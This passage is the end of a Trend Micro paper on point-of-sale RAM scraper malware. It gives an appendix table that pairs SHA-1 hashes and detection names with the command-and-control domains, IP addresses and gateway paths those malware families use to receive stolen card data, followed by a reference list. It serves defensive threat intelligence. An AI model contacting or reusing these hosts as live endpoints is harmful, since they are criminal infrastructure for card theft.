data movement. approach across the payment chain.” [64]

• Deep Discovery can detect bulk data


exfiltration.

75
Trend Micro | PoS RAM Scraper Malware

APPENDIX

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

121d097c4cc6cabd5989675e9ec01981b921f381 fra.ishareda.com

8259ea5b9b4c7a2ba89c5c45aaa5ca6cce330282 hoqou.su BKDR_ALINA.GN

fe98267b11389841a5197a5fc8a0b2ad2dceed0c 666andro.net

stylishkattyrock.com
4e682b34c3e122e55d21f9a501b9f13afb7437a9 BKDR_ALINA.KER
redsylockyboons.com

208.98.63.228

5563e4c2987eda056b3f74716c00d3014b9306bc uipoqworkas.com BKDR_ALINA.NA

someligeoas.com

zwaonoiy.com

46edd03812670f0cbef733894b9ce06ed6a6ba8c 208.98.63.228 BKDR_ALINA.NB

193.169.87.147

jikobins.com

183bdebb8872f12f5379b8d40030059513317361 ioconzus.com

204.188.242.201 BKDR_ALINA.NG

ioconzus.com
38540d09a90a60afdc7d5039cf37c453e4055ee2
jikobins.com

76
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

38540d09a90a60afdc7d5039cf37c453e4055ee2 204.188.242.201 BKDR_ALINA.NG

stylishkattyrock.com
10a4cfc9dedff9d254b73c32b696299d26b19ca7 BKDR_ALINA.NH
redsylockyboons.com

43afd24048a0281d6f4699627d2363e847b34aa8 888andro.net BKDR_ALINA.NI

5485d8332d12423fcc8920eedf87194a1ed154b8 204.188.242.201 BKDR_ALINA.NJ

32538bc513641cc37b21c93b3aaee142ccf59ffa 204.188.242.201 BKDR_ALINA.OA

tyrnslqoa.biz

ea8f102be4ea3a641e7970c18d026917f68212c6 BKDR_ALINA.OB
208.98.63.226/goose/
push.php

ioconzus.com

7896b0aada9e491b15996bd6b73964c10e977a6c jikobins.com BKDR_ALINA.OC

204.188.242.201

208.98.63.226/goose/
9107d1b360ff8e50141661729503ec1907529498 BKDR_ALINA.OE
push.php

208.98.63.226/goose/
fc5255f94762392f7a4e0269c8857750e1e7be93 BKDR_ALINA.OF
push.php

68276c0b7e3f086d009263c0758a61907567f366 204.188.242.201 BKDR_ALINA.OH

ioconzus.com

15cb85e6373011981b2a4961bbcb5708fb5b3dda jikobins.com BKDR_ALINA.OI

204.188.242.201

77
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

a368829bc400284f1803f4e5de5844ae4ccdedf1 204.188.242.201 BKDR_ALINA.OJ

19c28475fb7e5b2cbefe3e7d74ba51c950a964ce 204.188.242.201 BKDR_ALINA.OL

84.22.106.87/
13ef5f8e812a692c0893ad935b48b3f1a4aec615 BKDR_ALINA.OM
asdwer/1.php

host3.com

aadb31534bd276fa2f3029e89e93140a48a5ce0d fastbussineslife.net BKDR_ALINA.ON

204.188.242.201

1b3dcfeda9d01dc428d954812c81f7bda1af5373
193.107.17.126 BKDR_DEXTR.A
6c090aa226a719d8d948ad5244252b8b0c5e0af2

37.0.122.142/alfa/
1aa7185a16ca692488c76204bec5eabce3c07b5e
gateway.php

62.76.44.111/fk/
5d46b487372ccd6939da7aa4c68b75d0740501ed
gateway.php

151.248.115.107/
ial9121988921973dsa
dde7cfcc196df7107a5ca31ac4ea120b667dd861
das8dsa080dsa/
gateway.php BKDR_DEXTR.C

62.76.44.111/fk/
df963c2ef9544c2b49488a67bf9efe841af53f0f
gateway.php

backup-service.in.ua/
alfa/gateway.php
57416ce29c9b3c5f01bbbc599007da4734f733bc
37.0.122.142/alfa/
gateway.php

89.45.14.69/a/gateway.
ab96ff2df5092eb36082e948f1524ec339de8965 BKDR_DEXTR.D
php

78
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

7cd3619280f57a0d8b27ec0374256f4c64f4f9a8 46.19.143.252 BKDR_DEXTR.OT

89.45.14.69/a/gateway.
047fef6f231e25fe46147e173a2ecf677aaa4898
php

188.240.34.210/
0f9979c65e72ea07bef715eb3c549c5ca1b50f16 outpost/exes/sysproc.
exe

0fa6eb784c3a8a5ae65dba50f8da878dceecf467
198.23.129.146/panel/
gateway.php
14b7ba38d0dc8b6009217b5a4a15cd7d49a3a2c4

17e0cfaeb3f89814310f423b2605e6f80df18557
46.19.143.252/w3e4/
gateway.php
246d1d33e72d7e5e5b27da7c2cf8e912e577641e

33c16196ec7a2f0029a0506955eaf14b22cbdffe 64.90.187.223

BKDR_DEXTR.SMM
46.19.143.252/w3e4/
3a2c85304e208cc3be0fc887c7f18b4f89a527ef
gateway.php

62.76.44.111/fk/
3e2c3966d856331c184b810fd32b7dfc8e5080df
gateway.php

3fa9fc69c1f78b87ed3a2975f87056735c921e73 64.90.187.223

499458fe40103ef993b05cb1cced3bdbffd71428 46.19.143.252

4e7f1ff74fb8e6b82bd07c55522d4f5a9f5a5249 byroec2.com

55ded557a7efa1de0644ba6cdae5879816e365a7 houseofcarders.com

5999736d0c5a203aeb242689250a27396f39e996 5.199.165.24

5dc93a9ef1f2611a6d9967c697fa8680300878a0 www . g45d . net

79
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

6e88d96a56bb35fa465a3a92b6cf7ffac69a12b4 666.andro.net

6eb299b368d94fb6f340d40d0c284830f22f4664

7b9ccd34334ad2d9c728122162f399d8313f9e89
houseofcarders.com
99aa3b75d8c9744e46ba4fe301a890a636eb4ad7

a21219db5b9c43e9ed0b475c1df1c1e414413443

109.163.229.57/w3e4/
87c120dccbc9e7c7d0f0c5e6e6e5eb692da97422
gateway.php

89.45.14.69/a/gateway.
8e03f0f6d9ac7640c179c40844ce3718c3884278
php

a5da1c138c7cf738e5072d23aadffa103f57c9cb 78.108.93.135

a6560383ec0843ca6584c7c2a0c163b2c1ab3fc9 www . pgdex . com BKDR_DEXTR.SMM

62.149.24.147/dexter/
ace7e975bb54117a906c07161883a51f14a701cb
gateway.php

89.45.14.69/a/gateway.
affd76583196c8dace21aab4076a1fd0e3ec177c
php

b870a82781aa0dbdb0c2fcedea5ee58f01321885

c8745571b2933ea1c56e5dc069d5449875990dcf 46.19.143.252

858d9b29ac3b808b754dc17fea48b6a26dc854b4

c05381ccab1b49f11b0898d0ea64fb2df8b6f2cb casinoloader.com

e568d933209b721ac6a8ec4837a603bd80633fa5 macar.na.tl

f325e26c82eb68a05af93890c13a246202ea658b houseofcarders.com

80
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

f87ad687168d7d418b92a3d8019bb44ffe00cc03 37.221.171.104

www . y4j5 . com

0840392259f4cb23ae68bb420e57a4530d7fe0f8
backup-service.in.ua/
BKDR_DEXTR.SMM
alfa/gateway.php

141.255.165.145
a8bb7ce5e8616241a268666cd07926938dfbbe44
37.0.122.142

www . 
663a22ba842a1cce519615296a88d66eb0035f88 BKDR_HESETOX.B
posterminalworld . la

7536f3f518825b4d66b5fa34bbb2782e5deb1038
www . 
posterminalworld . la
8f1fbf88831e7b6c4186603cad0f0df89b1d0aee BKDR_HESETOX.CC

e1efc96c22a55933816e81bc7f9efa9339ac6a25 gmxdotkomlive.ru

00444b93a3f3b68058a5227ae57a91646ff8b3b5 ibenterprises.com.pk

12b780648ab830e473edb23a7b2edafbdf9e814a test.debian-bg.org

4bb9ddc057d94f3792da390fb97ce75569835f95 www . lolo . co . in

55f3a29e610fd1e0ffe0b36035807b7f29e4a7eb www . 3m21l . com

BKDR_HESETOX.
5631a8d02f2f29804bdd065544bcaf5938e1632c mx3.ringtonetrip.com SMJ

87ef9ed0f5c24c91bc6e8c4a601460f317c05e69 vsk.ignorelist.com

www . 
8fdeb5e6e178f0c88ab0b48c0c14a7e3b691514d
posterminalworld . la

www . cam2cam47 . 
92931192720392c70c0e9e99eaee2729b15013be
infosite . me

81
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

c4aa7606137010ba9c3fc7433bc127275b7eb181 fasunshi.com

checkmeout.host-ed.
d56e22f190f8a5336cbd1160ca776ceae5e0588c
me

e134e8b327b93c5d25168c8dfbf0c3f8a9e9238a adobeupdater.ng
BKDR_HESETOX.
SMJ
ec1294c2625ad714032be065f811bd153bdd1992 5.199.164.240

www . ibenterprises .
 com . pk
c1868c17c20d98df05be8dbd99bc1146a584842d

144.76.119.139

b85ea67877ecdd4f13f7822375d9af5f775e45e7 38robpl95.esy.es
BKDR_HESETOX.
www .  SVD
f9e70830ca9b8859e8503112ba9a6a9af47ca6db
posterminalworld . la

0fdd3f4bcef35561dffc4eb50cefa6dc695560bd
62.76.44.111/fk/
BKDR_PCCLIENT.DX
gateway.php
f71971c5e9205f1a6b17f30b7e69975228ebbe16

www . 
7e4538c27de7c24a439a82309d7241fb0d45249a BKDR_VSKIM.A
posterminalworld . tk

5572a1ddebb75e964708c53059514ecea24290dd 654andro.net TROJ_ALINAOS.A

TROJ_BANLOAD.
f69d253bad4e4d2c90663c18b9f341ac2fd89145 141.255.160.58
KGD

TROJ_COMREROP.
6152afc75a669503083f21df23b636013f807c8f cl3an45u.biz
ST

026da25835816905926d645607f90195bbf6a398 imagick.biz
TROJ_DELF.XXBL
b4fcc660a22ec1005712787e2a5f1e691534baa2 222andro.net

82
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

backup-service.in.ua/
663dc00b75b62ba32f662d3999a704d9044b368b
alfa/gateway.php
TROJ_DEXTER.CF
37.0.122.142/alfa/
663dc00b75b62ba32f662d3999a704d9044b368b
gateway.php

83a0372438367a6ba3b8e77b312cf386073b3845 houseofcarders.com TROJ_DEXTR.OP

70e08f55ade152e364ed2523b7c3dacf2d298424 houseofcarders.com TROJ_DEXTR.UN

e0d3ed6bf2a8576550c7c5bb662be4d8d0cff271 hoqou.su TROJ_FIDOBOT.SM0

2e3e8a3454262016d1d453c702a0dc8b42e29d5f 84.22.106.94 TROJ_INJECT.AWH

16ce3410a4295132590a0fd81bcf910c731c1b47 mcsup.cc

a157c05b4988e18eb31a5bc087fe3cfd10982eea h61309.srv5.test-hf.ru TROJ_MALEX.YVB

b3f86c635c74c18caecaaf9749344d17cd5a06c8 78.108.93.135

151.248.115.107/
ial9121988921973dsa
e8db5ad2b7ffede3e41b9c3adb24f3232d764931 TROJ_PINCAV.SY
das8dsa080dsa/
gateway.php

8e984227ce0c5ac85852ec18dbc4262d4cd63e16 109.234.159.254
TROJ_POSTOLI.A
8e984227ce0c5ac85852ec18dbc4262d4cd63e16 mcsup.cc

62.76.44.111/fk/
d082f85f265b5fffc39ab1120cd431b9c36a43cf TROJ_POXTERS.AD
gateway.php

3c93109b22c64acdfc3feba386aa19802481ccb5
houseofcarders.com TROJ_POXTERS.NIM
9740ee1ff36b00a0e5c4c34ddbdd6fc2e425c25b

rolex216.8s.nl/go/
0e7ee5116fbca7653d87fe19171612a6a0278be4 TROJ_SPNR.07FR13
go.php

83
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

someligeoas.com

582b53580277eb8fc60c84972345bfec7b6eff0c uipoqworkas.com TROJ_SPNR.10B713

208.98.63.228

208.98.63.226/goose/
b9b6aea307491ca07deaded821838b86f2961f77 TROJ_SPNR.11CA13
push.php

a80e68e809057f8b060861958eb24feee000732b hoqou.su TROJ_SPNR.14H613

redirection67.net78.
5160c089b463ea8c661e5667512edad8d4a331a7 TROJ_SPNR.15AF14
net/hm/gateway.php

208.98.63.226/goose/
805dc00b0687646b98971a0220e088658ae8deae TROJ_SPNR.15FE13
push.php

dailygiftclub.info
41626f258b898d80ef44fc9041835f438fbf4928 TROJ_SPNR.38B814
dailygiftclub1.info

27fe4680e4cb46b32b6063ccf0e48ecba385fbe1 mcsup.cc TROJ_SPNR.38JH13

serveftp.com/www.
f4cb0c9522b5bd1c2a1d1e68f0958e01826b0c85 TROJ_SPNR.38L213
paypal.com/

5d1fce02ef507a7401e7742471fa460dbc0bf415 999andro.net TSPY_ALINAOS.CC

www . inf0nix . com / 
d875ff7c1834bd28a40ae49e266df4aed29695c3 TSPY_BANKER.CC
notify . php

genporno.info
eb447af477eb480518283a30330ec39c8d5bd7bb TSPY_FAREIT.OP
67.215.65.132

2301208c5b75c036b0dcc7aad0fd95f6df3dc10d sopvps.hk
TSPY_JACKPOS.SM
59821dd4233c2901a7e60e72d417f9dce7357ee2 cl3an45u.biz

84
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

ccfc0fa22d1e3feeeabc5ca090b76f58f67edada sopvps.hk

sopvps.hk:80/post/
91f1b7b6c7cf89786c770fe9fdc861c4e01d5d5b
echo
TSPY_JACKPOS.SM

dailygiftclub1.info
956128fcc8f8c12d0ffde76e173d69fd97fdcfe0
dailygiftclub.info

www . q1w2e3r4 . pro / 
4a248539308bc04ac8d574e34bb984f47814b3a8 TSPY_POCARDL.AI
bot . php

tabz.org/Panel/post.
02dc617cfb5ee4449ba10a7ee9a86b3e2e8dff36
php

31dad731919e20c0cb3ce98efc01daea4ac34f21 109.75.176.63
TSPY_POCARDL.AK

www . krakau - 
5c6235b78850b7e4c80606227af9c1f2a7c75f66 traktoren . com / panel /
 post . php

bdd11b46cffad0933e3a62b827e343a8612f630e mcsup.cc TSPY_POCARDL.B

266b481113db8a57ef63f7fca7ef0682e5c94f00 109.75.176.63

61627fde1b62ced55715e59bdbbbc13a24c11908 accsforall.net
TSPY_POCARDL.
DAM
c8078e219e82b41f0f841efd3e20462a795c6f5c 109.75.176.63

f5f087901529464c0014da1d22e6e1e3cf39d270 autos-mark.comlu.com

www . q1w2e3r4 . pro / 
262e603e8a388743eac0ca241bc60703a8c465b8 TSPY_POCARDL.H
bot . php

ftp.sobachka.comze.
052b95a51a6cdbead362894cc41ce630714e3ae0
com
TSPY_POCARDL.SM

37c55eba1d13d73392a86e03b1e24def2d2d08ae ftp.onelove.16mb.com

85
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

91a8791a0ec422fa951a84971e71a5a61b66cad0 ftp.onelove.16mb.com

448d43cb663505fe39cf348d84de7fd8763d2d58 ftp.c4a.16mb.com
TSPY_POCARDL.SM

ftp.sobachka.comze.
997e01901442de14aad9e999c02d6ab2a4cdeeb1
com

9b757df9a97f1b65be065da7d64948737925ec8b
ftp.krokodil.netai.net
b20d49115653946ae689d0d572fdfc483ea04cc5

ftp.sobachka.comze.
b253ddc656c0d99c2b34c9979251a912ade4dd92
com

fa696af7acbbdca78003eccb798f7afc3fa4c535 184.22.104.41
TSPY_POCARDL.SM
www . pidginshop . ws / 
reports /
f2731e20841e63f728abfbe1c6ee506105e39317

184.22.104.41

184.22.104.41
2e5b1ad17423c4ff4ed45f10ab088db4ded90eb7
ree4.7ci.ru

19a7bcd9381075ed062fb2bb87ae64600afd0b7c www . inf0nix . com
TSPY_
POCARDLER.B
d72a0b8e7117f0c5e2ef0901bc58274ea41c9d3a inf0nix.com

7789b069f6eea55e305c4844ac442f6c0d0aa280 193.107.17.126
TSPY_ZBOT.DX
3634d3fdb93e6ae92ca47188efb320cf636763b8 193.107.17.126

BKDR_DEXTR.A
3634d3fdb93e6ae92ca47188efb320cf636763b8 193.107.17.126
BKDR_DEXTR.B

86
Trend Micro | PoS RAM Scraper Malware

PoS RAM Scraper C&C Data

C&C Server Trend Micro


SHA-1
Address Detection Name

mirandfg.info
9eb10078dff148ae6d95d3c00f98a1316bca1676 TSPY_ZBOT.SM15
1fresd.info

87
Trend Micro | PoS RAM Scraper Malware

REFERENCES

1. Brian Krebs. (October 10, 2013). Krebs on 9. CreditCards.com. (2013). “How a Credit Card
Security. “Nordstrom Finds Cash Register Is Processed.” Last accessed August 18,
Skimmers.” Last accessed August 22, 2014, http://www.creditcards.com/credit-card-
2014, http://krebsonsecurity.com/2013/10/ news/assets/HowACreditCardIsProcessed.
nordstrom-finds-cash-register-skimmers/. pdf.

2. Visa Inc. (2008). “Visa Data Security Alert: 10. Pravin Vazirani. (2014). Chetu. “Choosing
Debugging Software—Memory Parsing Between Payment Gateway & Payment
Vulnerability.” Last accessed August 18, 2014, Processor.” Last accessed August 18, 2014,
http://usa.visa.com/download/merchants/ http://www.chetu.com/blogs/finance-2/
debugging_software_memory.pdf. choosing-between-payment-gateway-and-
payment-processor-2/#sthash.zlwoHPVZ.
3. Wade H. Baker, C. David Hylender, and dpbs.
J. Andrew Valentine. (2009). “2009 Data
Breach Investigations Supplemental Report.” 11. ISO. (2014). “ISO/IEC 7813:2006: Information
Last accessed August 18, 2014, http://www. Technology—Identification Cards—Financial
verizonenterprise.com/resources/security/ Transaction Cards.” Last accessed August
reports/rp_2009-data-breach-investigations- 19, 2014, http://www.iso.org/iso/home/
supplemental-report_en_xg.pdf. store/catalogue_tc/catalogue_detail.
htm?csnumber=43317.
4. Verizon. (2014). “2014 Data Breach
Investigations Report.” Last accessed August 12. Wikimedia Foundation, Inc. (August 14,
18, 2014, http://www.verizonenterprise.com/ 2014). Wikipedia. “Magnetic Stripe Card.”
DBIR/2014/reports/rp_Verizon-DBIR-2014_ Last accessed August 19, 2014, http://
en_xg.pdf. en.wikipedia.org/wiki/Magnetic_stripe_card.

5. Gregory Wallace. (January 13, 2014). CNN 13. Numaan Huq. (May 28, 2014). TrendLabs
Money. “Target and Neiman Marcus Hacks: Security Intelligence Blog. “Scrape FAST,
The Latest.” Last accessed August 18, 2014, Find ’em Cards Easy!” Last accessed
http://money.cnn.com/2014/01/13/news/ August 19, 2014, http://blog.trendmicro.com/
target-neiman-marcus-hack/. trendlabs-security-intelligence/scrape-fast-
findem-cards-easy/.
6. US-CERT. (January 2, 2014). US-CERT.
“Alert (TA14-002A): Malware Targeting Point 14. Wikimedia Foundation, Inc. (August 19,
of Sale Systems.” Last accessed August 18, 2014). Wikipedia. “Bank Card Number.”
2014, https://www.us-cert.gov/ncas/alerts/ Last accessed August 19, 2014, http://
TA14-002A. en.wikipedia.org/wiki/Bank_card_number.

7. Visa Inc. (2014). “Card Acceptance 15. PCI ComplianceGuide.org. (2014). “PCI
Guidelines for Visa Merchants.” Last FAQs.” Last accessed August 19, 2014,
accessed August 18, 2014, http://usa.visa. https://www.pcicomplianceguide.org/pci-
com/download/merchants/card-acceptance- faqs-2/.
guidelines-for-visa-merchants.pdf.
16. IBM Knowledge Center. “Requirement 1:
8. Slava Gomzin. (February 2014). Hacking Install and Maintain a Firewall Configuration
Point of Sale: Payment Application Secrets, to Protect Cardholder Data.” Last accessed
Threats, and Solutions. August 19, 2014, http://www-01.ibm.com/

88
Trend Micro | PoS RAM Scraper Malware

support/knowledgecenter/SSZLC2_7.0.0/ 25. Josh Grunzweig. (December 31, 2012).


com.ibm.commerce.pci.doc/concepts/ Trustwave SpiderLabs: Anterior. “The Dexter
csepcireq1.htm. Malware: Getting Your Hands Dirty.” Last
accessed August 19, 2014, http://blog.
17. Chester Wisniewski. (November 30, 2011). spiderlabs.com/2012/12/the-dexter-malware-
Naked Security. “Targeted Attacks Steal getting-your-hands-dirty.html.
Credit Cards from Hospitality and Educational
Institutions.” Last accessed August 19, 2014, 26. Trend Micro Incorporated. (2014). Security
http://nakedsecurity.sophos.com/2011/11/30/ Intelligence. “Point-of-Sale System Breaches:
targeted-attacks-steal-credit-cards-from- Threats to the Retail and Hospitality
hospitality-and-educational-institutions/. Industries.” Last accessed August 19, 2014,
http://www.trendmicro.com/cloud-content/us/
18. Trend Micro Incorporated. (2014). Threat pdfs/security-intelligence/white-papers/wp-
Encyclopedia. “TROJ_BANKER.QPA.” Last pos-system-breaches.pdf.
accessed August 19, 2014, http://about-
threats.trendmicro.com/us/malware/troj_ 27. Brian Krebs. (January 15, 2014). Krebs on
banker.qpa. Security. “A First Look at the Target Intrusion,
Malware.” Last accessed August 20, 2014,
19. Trend Micro Incorporated. (2014). Threat http://krebsonsecurity.com/2014/01/a-first-
Encyclopedia. “ALINA.” Last accessed August look-at-the-target-intrusion-malware/.
19, 2014, http://about-threats.trendmicro.com/
us/malware/alina. 28. Identity Theft Resource Center. (March
24, 2014). “Identity Theft Resource
20. Josh Grunzweig. (May 17, 2013). Trustwave Center: 2013 Breach List.” Last
SpiderLabs: Anterior. “Alina: Following the accessed August 20, 2014, http://www.
Shadow Part 1.” Last accessed August 19, idtheftcenter.org/images/breach/2013/
2014, http://blog.spiderlabs.com/2013/05/ UpdatedITRCBreachReport2013.pdf.
alina-following-the-shadow-part-1.html.
29. Brian Krebs. (May 6, 2014). Krebs on
21. Numaan Huq. (February 16, 2013). Naked Security. “The Target Breach, by the
Security. “Point-of-Sale Malware Attacks— Numbers.” Last accessed August 20, 2014,
Crooks Expand Their Reach, No Business http://krebsonsecurity.com/2014/05/the-target-
Too Small.” Last accessed August 19, 2014, breach-by-the-numbers/.
http://nakedsecurity.sophos.com/2013/02/16/
point-of-sale-malware-attacks-no-business- 30. Keith Jarvis and Jason Milletary. (January
too-small/. 24, 2014). “Inside a Targeted Point-of-Sale
Data Breach.” Last accessed August 20,
22. Chintan Shah. (March 21, 2013). McAfee 2014, http://krebsonsecurity.com/wp-content/
Blog Central. “VSkimmer Botnet Targets uploads/2014/01/Inside-a-Targeted-Point-of-
Credit Card Payment Terminals.” Last Sale-Data-Breach.pdf.
accessed August 19, 2014, http://blogs.
mcafee.com/mcafee-labs/vskimmer-botnet- 31. Matt_Oh. (January 31, 2014). HP. “An
targets-credit-card-payment-terminals. Evolution of BlackPOS Malware.” Last
accessed August 21, 2014, http://h30499.
23. Aviv Raff. (December 11, 2012). Seculert. www3.hp.com/t5/HP-Security-Research-Blog/
“Dexter—Draining Blood Out of Point of An-evolution-of-BlackPOS-malware/ba-
Sales.” Last accessed August 19, 2014, p/6359149#.U_WP2PmSySp.
http://www.seculert.com/blog/2012/12/dexter-
draining-blood-out-of-point-of-sales.html. 32. Trend Micro Incorporated. (2014). Threat
Encyclopedia. “TSPY_DECBAL.A.” Last
24. Marcos Agüero. (February 26, 2014). accessed August 20, 2014, http://about-
S21sec. “The Dexter Trojan.” Last accessed threats.trendmicro.com/us/malware/TSPY_
August 19, 2014, http://securityblog.s21sec. DECBAL.A.
com/2014/02/the-dexter-trojan.html.

89
Trend Micro | PoS RAM Scraper Malware

33. Oracle. (2014). Oracle Java Documentation. page.html.


“The While and Do-While Statements.” Last
accessed August 20, 2014, http://docs.oracle. 41. Nart Villeneuve, Joshua Homan, and Kyle
com/javase/tutorial/java/nutsandbolts/while. Wilhoit. (July 9, 2014). FireEye. “BrutPOS:
html. RDP Bruteforcing Botnet Targeting POS
Systems.” Last accessed August 21, 2014,
34. Josh Grunzweig. (February 11, 2014). http://www.fireeye.com/blog/technical/botnet-
Trustwave SpiderLabs: Anterior. “JackPOS— activities-research/2014/07/brutpos-rdp-
The House Always Wins.” Last accessed bruteforcing-botnet-targeting-pos-systems.
August 20, 2014, http://blog.spiderlabs. html.
com/2014/02/jackpos-the-house-always-wins.
html. 42. Homeland Security. (July 31, 2014).
“Backoff: New Point of Sale Malware.” Last
35. phpBB Group. KernelMode.info. “Point- accessed August 20, 2014, https://www.
of-Sale Malwares/RAM Scrapers.” us-cert.gov/sites/default/files/publications/
Last accessed August 20, 2014, http:// BackoffPointOfSaleMalware.pdf.
www.kernelmode.info/forum/viewtopic.
php?f=16&t=1756&start=160%20#p22150. 43. Josh Grunzweig. (July 31, 2014). Trustwave
SpiderLabs: Anterior. “Backoff—Technical
36. Matthew Bing. (June 2, 2014). Arbor Analysis.” Last accessed August 20, 2014,
Networks DDoS & Security Reports. “The http://blog.spiderlabs.com/2014/07/backoff-
Best of Both Worlds—Soraya.” Last accessed technical-analysis.html.
August 20, 2014, http://www.arbornetworks.
com/asert/2014/06/the-best-of-both-worlds- 44. Trend Micro Incorporated. (2014). Threat
soraya/. Encyclopedia. “TSPY_POSLOGR.A.” Last
accessed August 20, 2014, http://about-
37. Marco Preuss. (December 13, 2013). threats.trendmicro.com/us/malware/TSPY_
SecureList. “ChewBacca—A New Episode POSLOGR.A.
of Tor-Based Malware.” Last accessed
August 20, 2014, http://securelist.com/blog/ 45. Trend Micro Incorporated. (2014). Threat
incidents/58192/chewbacca-a-new-episode- Encyclopedia. “TSPY_POSLOGR.B.” Last
of-tor-based-malware/. accessed August 20, 2014, http://about-
threats.trendmicro.com/us/malware/TSPY_
38. Yotam Gottesman. (Jnauary 30, 2014). RSA: POSLOGR.B.
Speaking of Security. “RSA Uncovers New
POS Malware Operation Stealing Payment 46. Trend Micro Incorporated. (2014). Threat
Card & Personal Information.” Last accessed Encyclopedia. “TSPY_POSLOGR.C.” Last
August 20, 2014, https://blogs.rsa.com/ accessed August 20, 2014, http://about-
rsa-uncovers-new-pos-malware-operation- threats.trendmicro.com/us/malware/TSPY_
stealing-payment-card-personal-information/. POSLOGR.C.

39. Trend Micro Incorporated. (2014). Threat 47. Privacy Rights Clearinghouse. (2014). Last
Encyclopedia. “TSPY_FYSNA.A.” Last accessed August 20, 2014, https://www.
accessed August 20, 2014, http://about- privacyrights.org/.
threats.trendmicro.com/us/malware/TSPY_
FYSNA.A. 48. Wikimedia Foundation, Inc. (August 9,
2014). Wikipedia. “Air Gap (Networking).”
40. Pierluigi Paganini. (January 20, 2014). Last accessed August 20, 2014, http://
Security Affairs. “IntelCrawler Update— en.wikipedia.org/wiki/Air_gap_(networking).
BlackPOS Author Forgot Delete Social
Network Page.” Last accessed August 49. NIST. (2014). National Vulnerability
20, 2014, http://securityaffairs.co/ Database. “Vulnerability Summary for CVE-
wordpress/21441/cyber-crime/intelcrawler- 2010-1033.” Last accessed August 21,
blackpos-author-forgot-delete-social-network- 2014, http://web.nvd.nist.gov/view/vuln/

90
Trend Micro | PoS RAM Scraper Malware

detail?vulnId=CVE-2010-1033. of Card Recon in Circulation.” Last accessed


August 21, 2014, http://www.groundlabs.com/
50. Bernadette Irinco. (May 19, 2014). TrendLabs blog/index.php/2014/06/unauthorised-copies-
Security Intelligence Blog. “Targeted Attack of-card-recon-in-circulation/.
Trends: A Look at 2H 2013.” Last accessed
August 21, 2014, http://blog.trendmicro. 59. Vincenzo Ciancaglini, Marco Balduzzi, Max
com/trendlabs-security-intelligence/targeted- Goncharov, and Robert McArdle. (2013).
attack-trends-a-look-at-2h-2013/. Security Intelligence. “Deep Web and
Cybercrime: It’s Not All About Tor.” Last
51. NIST. (2014). National Vulnerability accessed August 21, 2014, http://www.
Database. “Vulnerability Summary for CVE- trendmicro.ca/cloud-content/us/pdfs/security-
2012-1889.” Last accessed August 21, intelligence/white-papers/wp-deepweb-and-
2014, http://web.nvd.nist.gov/view/vuln/ cybercrime.pdf.
detail?vulnId=CVE-2012-1889.
60. Max Goncharov. (2014). Security Intelligence.
52. NIST. (2014). National Vulnerability “Russian Underground Revisited.” Last
Database. “Vulnerability Summary for CVE- accessed August 21, 2014, http://www.
2012-4681.” Last accessed August 21, trendmicro.com/cloud-content/us/pdfs/
2014, http://web.nvd.nist.gov/view/vuln/ security-intelligence/white-papers/wp-russian-
detail?vulnId=CVE-2012-4681. underground-revisited.pdf.

53. NIST. (2014). National Vulnerability 61. Jaikumar Vijayan. (March 29, 2007).
Database. “Vulnerability Summary for CVE- Computerworld. “TJX Data Breach: At 45.6M
2008-4841.” Last accessed August 21, Card Numbers, It’s the Biggest Ever.” Last
2014, http://web.nvd.nist.gov/view/vuln/ accessed August 26, 2014, http://www.
detail?vulnId=CVE-2008-4841. computerworld.com/s/article/9014782/TJX_
data_breach_At_45.6M_card_numbers_it_s_
54. Trend Micro Incorporated. (2014). Threat the_biggest_ever.
